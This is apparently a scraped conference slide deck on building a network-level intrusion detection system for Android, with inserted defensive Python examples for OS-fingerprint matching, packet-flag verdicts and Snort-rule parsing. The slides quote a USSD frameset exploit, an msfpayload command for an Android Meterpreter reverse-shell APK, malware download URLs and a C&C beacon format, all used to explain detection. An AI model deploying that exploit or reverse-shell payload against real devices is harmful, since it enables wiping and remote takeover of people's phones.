ANDROIDS: MOBILE SECURITY RELOADED

WHO I AM
• Passionate about computer security.
• Computer Engineering degree and an Executive MBA.
• I'm from Spain; we're sexy and you know it.
• You can follow my adventures at @segofensiva or in my blog http://www.seguridadofensiva.com
• Other conferences:
  • RootedCON in Spain
  • Nuit Du Hack in Paris
  • Black Hat Arsenal in USA
  • Defcon in USA
  • ...
JAIME SÁNCHEZ (@SEGOFENSIVA)

2

DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL
ANDROIDS: MOBILE SECURITY RELOADED

MOTIVATIONS
• Smartphones have evolved into sophisticated, compact minicomputers
• They store sensitive/private information and services
• Smartphone usage is on the rise
• Susceptible to various PC-like types of attacks
• The importance of security mechanisms is not yet understood
• Security mechanisms are not sufficient
• Variety of platforms
DEFCON 21

WHY ANDROID?
• Being popular is not always a good thing.
• Mobile malware and threats are clearly on the rise.
• Over 100 million Android phones shipped in the second quarter of 2012 alone.
• Targets this large are difficult for attackers to resist!


THE PLATFORM
• Android has inherited powerful base systems from the Linux kernel, such as memory management, multitasking and file management.
• Android is a platform which embraces numerous technologies like the Linux kernel, C++, Java, the Dalvik VM, etc.
• Android has a process-unit component model and provides system functions as server processes. For a functional mesh-up of processes, it provides Binder.
• Why has a new mechanism been developed, rather than using the IPC mechanisms, such as sockets and pipes, that Linux already provides? Because of performance.

SECURITY ARCHITECTURE
• Android seeks to be the most secure and usable operating system for mobile platforms by re-purposing traditional operating system security controls to:
  • Protect user data
  • Protect system resources (including the network)
  • Provide application isolation
• To achieve these objectives, Android provides these key security features:
  • Robust security at the OS level through the Linux kernel
  • Mandatory application sandbox for all applications
  • Secure interprocess communication
  • Application signing
  • Application-defined and user-granted permissions
• Each component assumes that the components below are properly secured.
THE PROBLEM?
There is a massive growth in the volume of malware families and samples ...
Google Play's track record with malware is not too good (Bouncer can be compromised) ...
THE ONLY PROBLEM?
Android v1.0
CVE-2009-0475 (Remote code execution)
CVE-2009-0606 (Privilege Escalation)
CVE-2009-0607 (Multiple Integer Overflows)
CVE-2009-0608 (Integer Overflow)
CVE-2009-1895 (Privilege Escalation)
CVE-2009-1754 (Access to Sensitive Information)
CVE-2009-2348 (Access to Camera and Record Audio)
CVE-2009-2656 (DoS through SMS)
CVE-2009-2999 (DoS through SMS)
CVE-2009-3698 (DoS through Dalvik API)
CVE-2009-1185 (Privilege Escalation)
CVE-2009-1186 (DoS through udev)
Android v2.0
CVE-2009-1442 (Code Execution)
CVE-2010-EASY (Privilege Escalation)
CVE-2009-2692 (Privilege Escalation)
CVE-2010-1807 (WebKit Privilege Escalation)
CVE-2010-1119 (WebKit Privilege Escalation)
CVE-2011-1149 (Privilege Escalation)
CVE-2011-3975 (Access to Sensitive Information)
CVE-2011-2357 (Cross-Application Scripting)
CVE-2011-0680 (Access to Sensitive Information)
CVE-2011-2344 (Gain Privileges and Access Pictures)
CVE-2011-1823 (Code Execution)
Android v3.0
CVE-2010-4804 (Information Disclosure)
CVE-2011-1823 (Privilege Escalation)
CVE-2011-0640 (Code Execution)
CVE-2011-1349 (DoS)
CVE-2011-1350 (Privilege Escalation)
CVE-2011-1352 (Privilege Escalation)
CVE-2011-2343 (Access to Sensitive Information)
CVE-2011-3874 (Privilege Escalation)
CVE-2011-2357 (Bypass Permissions)

DIRTY USSD
Poor SSL/TLS implementations
Kernel-mode driver exploits
NFC vulnerabilities
Android Master Key
...
!!! METERPRETER FOR ANDROID !!!


Mobile Pwn2Own 2013
• One exploit took advantage of two Chrome on Nexus 4 vulnerabilities: an integer overflow that affects Chrome and another Chrome vulnerability that resulted in a full sandbox escape and the possibility of remote code execution on the affected device.
• Two exploits compromised apps that are installed on all Samsung Galaxy S4 devices.

FIRST APPROACH

[Figure: VPN tunnel from the Android device (eth0: WiFi, rmnet0: 3G) to an Internet gateway where snort and tcpdump run]

• In order to analyze the traffic flows we'll create a VPN tunnel between our Android device and our computer.
• The VPN tunnel uses digital certificates (a public/private key pair) to authenticate the client and the server.
• Using digital certificates instead of a shared key gives higher flexibility; for instance, we can revoke access if the smartphone is lost.

• Once the VPN tunnel is established and the traffic is being sent to the VPS, we can start monitoring the traffic with snort.
• We will take advantage of two main signature sets: the official rules (the registered-user version) and the Emerging Threats rules.
• We can also use tools like tcpdump to capture traffic for later analysis.
• Wireshark gives a much better view of the content and the qualities of each IP datagram or TCP segment.
HELLO, LOSER!

LIFE CONTINUED

• OSfooler is a practical approach presented at Black Hat Arsenal USA 2013.
• It can be used to detect and defeat active and passive remote OS fingerprinting from tools like nmap, p0f or commercial appliances.

FROM KERNEL SPACE TO USER HEAVEN
How I met your packet

NMAP INTERNAL PROBES
Fingerprint Linux 2.6.17 - 2.6.24
Class Linux | Linux | 2.6.X | general purpose
SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U)
OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C)
WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018)
ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=)
T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=)
T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(DFI=N%T=3B-45%TG=40%CD=S)

Most important:
• TCP ISN greatest common divisor (GCD)
• TCP IP ID sequence generation algorithm (TI)
• TCP timestamp option algorithm (TS)
• TCP options (O, O1-O6)
• TCP initial window size (W, W1-W6)
• Responsiveness (R)
• IP don't fragment bit (DF)
• IP initial time-to-live guess (TG)

Although there are others:
• TCP ISN counter rate (ISR)
• ICMP IP ID sequence generation algorithm (II)
• Shared IP ID sequence Boolean (SS)
• Don't fragment ICMP (DFI)
• Explicit congestion notification (CC)
• TCP miscellaneous quirks (Q)
• TCP sequence number (S)
• etc.

NUIT DU HACK 2013

P0F SIGNATURES

8192:32:1:48:M*,N,N,S:.:Windows:98

Fields of the signature, left to right:

Window Size
  - * : any value
  - %nnn : multiple of nnn
  - Sxx : MSS multiple
  - Txx : MTU multiple
  - xxx : constant value
Initial TTL
DF Bit
Packet Size
TCP options and order
  - N: NOP
  - E: EOL
  - Wnnn: WS
  - Mnnn: MSS
  - S: SACK
  - T / T0: Timestamp
  - ?n
Quirks
  - Data in SYN packets
  - Options after EOL
  - IP ID field = 0
  - ACK different to 0
  - Unusual flags
  - Incorrect options decode
Operating System
  - Family
  - Version
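As an added example (not code from the slides, from the ANDROIDS project or from p0f itself), the parser below reads p0f v2 signatures in the eight-field form shown above and matches them against constructed descriptions of observed SYN packets, applying the window-size rules (*, %nnn, Sxx, Txx, constant), the option wildcards (M*, W*), the quirk list and a TTL hop tolerance. Only the Windows 98 line comes from the slide; the other database entries, the 30-hop tolerance and the observed packets are assumptions made for this example.

```python
"""Parse p0f v2 SYN signatures and match them against observed SYN packets.

Added example; not code from the slides, from the ANDROIDS project or from
p0f. It follows the eight-field layout shown above
(window:ttl:df:size:options:quirks:family:version). The database entries
other than the Windows 98 line, the hop tolerance and the observed packets
are constructed for this example.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class P0fSignature:
    window: str          # '*', '%nnn', 'Sxx', 'Txx' or a constant value
    ttl: int             # initial TTL of the sending stack
    df: int              # 1 if the don't-fragment bit is set
    size: str            # SYN packet size, or '*'
    options: List[str]   # TCP options in order, e.g. ['M*', 'N', 'N', 'S']
    quirks: str          # quirk letters; '.' means none
    os_family: str
    os_version: str


def parse_signature(line: str) -> P0fSignature:
    """Split one signature line into its eight colon-separated fields."""
    fields = line.strip().split(":")
    if len(fields) != 8:
        raise ValueError(f"expected 8 fields, got {len(fields)}: {line!r}")
    window, ttl, df, size, opts, quirks, family, version = fields
    return P0fSignature(window, int(ttl), int(df), size,
                        opts.split(",") if opts else [], quirks, family, version)


def _window_matches(spec: str, observed: int, mss: int) -> bool:
    if spec == "*":
        return True
    if spec.startswith("%"):                     # multiple of nnn
        return observed % int(spec[1:]) == 0
    if spec.startswith("S"):                     # multiple of the MSS
        return observed == int(spec[1:]) * mss
    if spec.startswith("T"):                     # multiple of the MTU (MSS + 40 for IPv4/TCP)
        return observed == int(spec[1:]) * (mss + 40)
    return observed == int(spec)                 # constant value


def _option_matches(spec: str, observed: str) -> bool:
    # 'M*' and 'W*' accept any MSS / window-scale value; all other options are exact
    if spec in ("M*", "W*"):
        return observed.startswith(spec[0])
    return spec == observed


def matches(sig: P0fSignature, pkt: dict, max_hops: int = 30) -> bool:
    """True if the observed SYN (a constructed dict) fits the signature."""
    if not _window_matches(sig.window, pkt["window"], pkt.get("mss", 0)):
        return False
    # The TTL is decremented at every hop, so the observed value may sit up to
    # max_hops below the initial TTL (the tolerance is an assumption of this example)
    if not (sig.ttl - max_hops < pkt["ttl"] <= sig.ttl):
        return False
    if sig.df != pkt["df"]:
        return False
    if sig.size != "*" and int(sig.size) != pkt["size"]:
        return False
    if len(sig.options) != len(pkt["options"]):
        return False
    if not all(_option_matches(s, o) for s, o in zip(sig.options, pkt["options"])):
        return False
    expected_quirks = set() if sig.quirks == "." else set(sig.quirks)
    return expected_quirks == set(pkt.get("quirks", ""))


def identify(pkt: dict, db: List[str]) -> Optional[str]:
    """Return 'family version' of the first matching signature, or None."""
    for line in db:
        sig = parse_signature(line)
        if matches(sig, pkt):
            return f"{sig.os_family} {sig.os_version}"
    return None


# Constructed mini database: the slide's Windows 98 line plus two made-up entries
SIGNATURE_DB = [
    "8192:32:1:48:M*,N,N,S:.:Windows:98",
    "S4:64:1:60:M*,S,T,N,W7:.:Linux:2.6 (example)",
    "65535:64:1:64:M*,N,W6,N,N,T,S,E,E:P:FreeBSD:9 (example)",
]

# Constructed observations, as a sensor would extract them from SYN packets
WIN98_SYN = {"window": 8192, "ttl": 21, "df": 1, "size": 48,
             "options": ["M1460", "N", "N", "S"], "quirks": "", "mss": 1460}
LINUX_SYN = {"window": 5840, "ttl": 55, "df": 1, "size": 60,
             "options": ["M1460", "S", "T", "N", "W7"], "quirks": "", "mss": 1460}
UNKNOWN_SYN = {"window": 5840, "ttl": 128, "df": 0, "size": 60,
               "options": ["M1460", "S", "T", "N", "W7"], "quirks": "", "mss": 1460}

if __name__ == "__main__":
    for name, pkt in (("win98", WIN98_SYN), ("linux", LINUX_SYN), ("unknown", UNKNOWN_SYN)):
        print(f"{name}: {identify(pkt, SIGNATURE_DB)}")
```

The Linux observation is matched through the S4 rule (window = 4 × MSS = 5840), and the third packet fails only on TTL, which is the kind of near miss a sensor should log rather than silently discard.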

BLACKHAT ARSENAL USA 2013

• I need to process traffic before it is processed inside my Android device.
• I can redirect all network packets from kernel space to user space.
• I can do whatever I want with the packets.
• This is done in real time.
• It runs continuously without human supervision and is completely transparent to the user.
I'VE GOT IT!
[Figure: protection rings from Ring 3 (less privileged) down to Ring 0 (kernel, more privileged), with devices attached at the outer rings]

• Computer operating systems provide different levels of access to resources.
• This is generally hardware-enforced by some CPU architectures that provide different CPU modes at the hardware or microcode level.
• Rings are arranged in a hierarchy from most privileged (most trusted, usually numbered zero) to least privileged (least trusted).
• On most operating systems, Ring 0 is the level with the most privileges and interacts most directly with the physical hardware such as the CPU and memory.

KERNEL vs USER SPACE

KERNEL SPACE is strictly reserved for running the kernel, kernel extensions, and most device drivers. In contrast, USER SPACE is the memory area where all user-mode applications work, and this memory can be swapped out when necessary.
Similarly, the term USERLAND refers to all application software that runs in user space. Userland usually refers to the various programs and libraries that the operating system uses to interact with the kernel: software that performs input/output, manipulates file system objects, etc.

WTF!?
[Figure: path of an incoming packet from the NIC to the application. NIC memory -> DMA engine -> ring buffer -> interrupt handler -> poll list -> softirq -> ip_rcv() (IP layer) -> tcp_v4_rcv() (TCP process, socket backlog, TCP receive buffer) -> read() in the application. The device driver, the IP layer and the TCP layer run in kernel space; only the application runs in user space.]

[Figure: the same packet path with the Netfilter hooks added. After ip_rcv() the packet passes the PREROUTING chains (conntrack, mangle); locally destined packets must pass the INPUT chains (filter) to reach listening sockets, while forwarded packets take the FORWARD chain. Forwarded and accepted packets continue processing.]


IPTABLES
A target extension consists of a KERNEL MODULE, and an optional extension to iptables to provide new command-line options.
There are several extensions in the default Netfilter distribution:


QUEUE
• QUEUE is an iptables and ip6tables target which queues the packet for userspace processing.
• For this to be useful, two further components are required:
  • a QUEUE HANDLER which deals with the actual mechanics of passing packets between the kernel and userspace; and
  • a USERSPACE APPLICATION to receive, possibly manipulate, and issue verdicts on packets.
• The default value for the maximum queue length is 1024. Once this limit is reached, new packets will be dropped until the length of the queue falls below the limit again.

$ iptables -A INPUT -j NFQUEUE --queue-num 0

ANDROIDS
The logo should look like ...

PLEASE! Don't make decisions at night in Las Vegas

ANDROIDS
• Create a serious open source network-based intrusion detection system (IDS) and network-based intrusion protection system (IPS) that has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks.
• It should feature:
  • Protocol analysis
  • Content searching
  • Content matching

IDS ARCHITECTURE: SENSOR
• Runs continuously and without human supervision, featuring:
  • Analyze traffic
  • Send push alerts to the Android device in order to warn the user about the threat
  • Report to the custom logging server
  • Deploy some reactive actions:
    • Drop specific packet
    • Add new rule in iptables firewall
    • Launch script / module
  • Sync attack signatures to keep them updated.
• It should impose minimal overhead.

IDS ARCHITECTURE: SERVER

[Figure: Android device -> Internet -> Firewall -> IDS server & database, with a web interface on the server]

• The server is running inside a Linux box, and is receiving all the messages the Android sensor is sending.
• The server is responsible for:
  • Sending signatures to remote devices
  • Storing events in the database
  • Detecting statistical anomalies and real-time analysis.

MAYBE ONE DAY ...
• Collaborative detection and detection of malware propagation patterns across a community of mobile devices
• Evaluate various detection algorithms
• Alert about a detected anomaly when it persists
• More reactive actions:
  • Uninstall suspicious application
  • Kill process
  • Disconnect radios
  • Encrypt data
• Monitor system calls in real time

PROTOCOL ANALYSIS
LOOKS LIKE I PICKED THE WRONG WEEK TO QUIT SNIFFING PACKETS
• Packet with FIN, SYN, PUSH and URG flags active.
• Report to the Central Logger and DROP the packet.

REMOTE OS FINGERPRINTING
• Detect and drop packets sent from well-known scanning tools.
• nmap OS fingerprinting works by sending up to 16 TCP, UDP, and ICMP probes to known open and closed ports of the target machine:
  • SEQUENCE GENERATION (SEQ, OPS, WIN & T1)
  • ICMP ECHO (IE)
  • TCP EXPLICIT CONGESTION NOTIFICATION (ECN)
  • TCP T2-T7
  • UDP
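Added example, not the ANDROIDS sensor's own code: the verdict logic a userspace handler would apply to each packet the kernel hands over through the NFQUEUE target shown earlier. It decodes the IPv4 and TCP headers from raw bytes, recognises the FIN+SYN+PUSH+URG combination from the previous slide together with the other handshake-impossible flag sets that nmap's T2-T7 probes use, and returns DROP with an event record for the central logger, accepting everything else. The packets are constructed in the file (checksums are not computed and nothing is sent), and the helper, label and event names are this example's assumptions.

```python
"""Userspace verdicts for the suspicious TCP flag combinations on these slides.

Added example, not the ANDROIDS sensor's code. A real sensor would call
verdict() from the callback of an NFQUEUE handler; here the packets are
constructed below (no checksums, nothing is sent) so the logic runs offline.
"""
import struct

TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK, TCP_URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag sets that never occur in a normal handshake but are sent by
# OS-fingerprinting and port-scanning probes (the labels are this example's).
SUSPICIOUS_FLAG_SETS = {
    TCP_SYN | TCP_FIN | TCP_PSH | TCP_URG: "SYN+FIN+PSH+URG probe",
    TCP_FIN | TCP_PSH | TCP_URG: "FIN+PSH+URG (Xmas) probe",
    TCP_SYN | TCP_FIN: "SYN+FIN probe",
    0: "null-flag probe",
}


def _fmt(addr: bytes) -> str:
    return ".".join(str(b) for b in addr)


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Decode the IPv4 header and, for TCP, the fixed TCP header (options are skipped)."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, _total, _ident, _frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    hdr = {"proto": proto, "src": _fmt(src), "dst": _fmt(dst), "ttl": ttl}
    if proto != 6:
        return hdr
    tcp = pkt[(ver_ihl & 0x0F) * 4:]
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    hdr.update(sport=sport, dport=dport, seq=seq, ack=ack, window=window,
               flags=off_flags & 0x3F,            # FIN, SYN, RST, PSH, ACK, URG
               payload=tcp[(off_flags >> 12) * 4:])
    return hdr


def verdict(pkt: bytes) -> dict:
    """Return {'verdict': 'DROP'|'ACCEPT', 'reason': str, 'event': dict|None}.

    'event' is the record the sensor would report to the central logger."""
    hdr = parse_ipv4_tcp(pkt)
    if hdr["proto"] != 6:
        return {"verdict": "ACCEPT", "reason": "non-TCP", "event": None}
    reason = SUSPICIOUS_FLAG_SETS.get(hdr["flags"])
    if reason is None:
        return {"verdict": "ACCEPT", "reason": "flags look normal", "event": None}
    event = {"type": "scan-probe", "detail": reason, "src": hdr["src"], "dst": hdr["dst"],
             "sport": hdr["sport"], "dport": hdr["dport"], "ttl": hdr["ttl"]}
    return {"verdict": "DROP", "reason": reason, "event": event}


def build_tcp_packet(flags: int, src: str = "203.0.113.5", dst: str = "192.0.2.10",
                     sport: int = 40000, dport: int = 80, payload: bytes = b"") -> bytes:
    """Construct an IPv4/TCP packet for testing; both checksums are left at zero."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 0, (5 << 12) | flags, 1024, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return ip + tcp


# Constructed samples: the probe from the slide, a null-flag probe and a normal SYN
PROBE_PACKET = build_tcp_packet(TCP_SYN | TCP_FIN | TCP_PSH | TCP_URG)
NULL_PROBE = build_tcp_packet(0)
NORMAL_SYN = build_tcp_packet(TCP_SYN)

if __name__ == "__main__":
    for name, p in (("probe", PROBE_PACKET), ("null", NULL_PROBE), ("syn", NORMAL_SYN)):
        v = verdict(p)
        print(f"{name}: {v['verdict']} ({v['reason']})")
```

Because the lookup is on the exact flag set, a packet with an extra ACK or RST bit falls through to ACCEPT; a production sensor would add the remaining probe shapes to the table and keep the per-source event count so that the logger can correlate a whole nmap run rather than single packets.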


PATTERN MATCHING

I'M WATCHING YOU...

SIGNATURE FORMAT
• With the help of custom-built signatures, the framework can also be used to detect probes or attacks designed for mobile devices.
• Useful signatures from Snort and Emerging Threats
• Convert snort-like rules to a friendly format:

MORE EXAMPLES!

Android 2.0 USE-AFTER-FREE REMOTE CODE EXECUTION
• Does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service.
• Executed via a crafted HTML document.


USSD EXPLOIT
• A USSD code is entered into phones to perform actions.
• They are mainly used by network operators to provide customers with easy access to pre-configured services, including:
  • call forwarding
  • balance inquiries
  • multiple SIM functions.
• The HTML code to execute such an action is as follows:
<a href="tel:xyz">Click here to call</a>
• Example exploit:
<frameset> <frame src="tel:*2767*3855#" /> </frameset>

MALWARE
• ANDR.TROJAN.SMSSEND
• Download from:
  • hxxp://adobeflashplayer-up.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
  • hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
  • hxxp://browsernew-update.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
• Once executed, it connects to the C&C: gaga01.net/rq.php
  board=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_id=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;time=XXXXXX;timezone=XXXXXX
• Search pattern: rq.php

METERPRETER
• It features command history, tab completion, channels, and more.
• Let's try:

$ msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.20 R > meter.apk
$ file meter.apk
  meter.apk: Zip archive data, at least v2.0 to extract
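Added example, not the framework's own converter (the SIGNATURE FORMAT slide does not show its output, so the dictionary layout is an assumption of this example): a parser that turns a single-line Snort-style rule into a plain dictionary and then applies its content matches, including nocase, negation, |hex| escapes and per-content modifiers such as http_uri, to a payload. The rule is written for this example around the rq.php search pattern and the beacon fields listed on the MALWARE slide; the HTTP requests are constructed with placeholder values and the sid is a private-range number chosen here.

```python
"""Convert Snort-style rules into a plain dictionary and run their content
matches over a payload.

Added example, not the ANDROIDS framework's converter (the slide does not
show its output format, so the dictionary layout here is this example's
own). The rule and the HTTP requests below are constructed for the demo;
the rq.php search pattern and the beacon field names come from the slide.
"""
import re

_HEX_BLOCK = re.compile(r"\|([0-9A-Fa-f\s]+)\|")

# Keywords that modify the content: keyword immediately before them
CONTENT_MODIFIERS = {"nocase", "http_uri", "http_header", "http_client_body", "rawbytes"}


def _decode_content(text: str) -> bytes:
    """Turn a Snort content string with |hex| blocks into bytes."""
    out, pos = b"", 0
    for m in _HEX_BLOCK.finditer(text):
        out += text[pos:m.start()].encode("latin-1")
        out += bytes.fromhex(m.group(1).replace(" ", ""))
        pos = m.end()
    return out + text[pos:].encode("latin-1")


def _split_options(body: str) -> list:
    """Split 'k:v; k; ...' at semicolons that are not inside double quotes."""
    opts, cur, in_quotes = [], "", False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            if cur.strip():
                opts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    if cur.strip():
        opts.append(cur.strip())
    return opts


def parse_rule(rule: str) -> dict:
    """Parse one single-line Snort rule into a dictionary (the 'friendly format')."""
    head, _, body = rule.strip().partition("(")
    if not body.endswith(")"):
        raise ValueError("rule options must be enclosed in parentheses")
    action, proto, src, sport, direction, dst, dport = head.split()
    out = {"action": action, "proto": proto, "direction": direction,
           "src": {"net": src, "port": sport}, "dst": {"net": dst, "port": dport},
           "options": {}, "contents": []}
    for opt in _split_options(body[:-1]):
        key, _, val = opt.partition(":")
        key, val = key.strip(), val.strip()
        if key == "content":
            negated = val.startswith("!")
            val = val.lstrip("!").strip().strip('"')
            out["contents"].append({"pattern": _decode_content(val), "negated": negated,
                                    "nocase": False, "modifiers": []})
        elif key in CONTENT_MODIFIERS and out["contents"]:
            if key == "nocase":                       # applies to the preceding content
                out["contents"][-1]["nocase"] = True
            else:
                out["contents"][-1]["modifiers"].append(key)
        else:
            out["options"][key] = val.strip('"')
    return out


def payload_matches(rule: dict, payload: bytes) -> bool:
    """Apply every content match (honouring nocase and negation) to a payload."""
    for c in rule["contents"]:
        if c["nocase"]:
            found = c["pattern"].lower() in payload.lower()
        else:
            found = c["pattern"] in payload
        if found == c["negated"]:                     # hit on a negated, or miss on a positive
            return False
    return True


# Constructed rule for the C&C check-in described on the MALWARE slide
BEACON_RULE = ('alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ('
               'msg:"EXAMPLE Andr.Trojan.SMSSend C&C check-in"; flow:to_server,established; '
               'content:"rq.php"; http_uri; content:"IMEI="; nocase; '
               'content:!"User-Agent|3a| Mozilla"; classtype:trojan-activity; sid:9000001; rev:1;)')

# Constructed requests: one shaped like the beacon on the slide (placeholder values), one benign
BEACON_REQUEST = (b"GET /rq.php?board=unknown;brand=generic;device=generic;imei=XXXXXX;"
                  b"imsi=XXXXXX;session_id=1 HTTP/1.1\r\nHost: gaga01.net\r\n"
                  b"User-Agent: Dalvik/1.6.0\r\n\r\n")
BENIGN_REQUEST = b"GET /index.php HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    rule = parse_rule(BEACON_RULE)
    print(rule["options"]["msg"], "->", payload_matches(rule, BEACON_REQUEST))
```

The modifiers (http_uri and friends) are recorded but, in this example, every content is searched over the whole payload; a sensor that has parsed the HTTP request would restrict each match to the buffer its modifier names, which is what keeps a rule like this from firing on rq.php appearing in a response body.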

THANK YOU!

JAIME SÁNCHEZ (@SEGOFENSIVA)
JSANCHEZ@SEGURIDADOFENSIVA.COM

(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Jaime Sánchez
 
Seguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPSeguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPJaime Sánchez
 

Mehr von Jaime Sánchez (6)

La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
 
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
 
Seguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPSeguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IP
 

Kürzlich hochgeladen

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
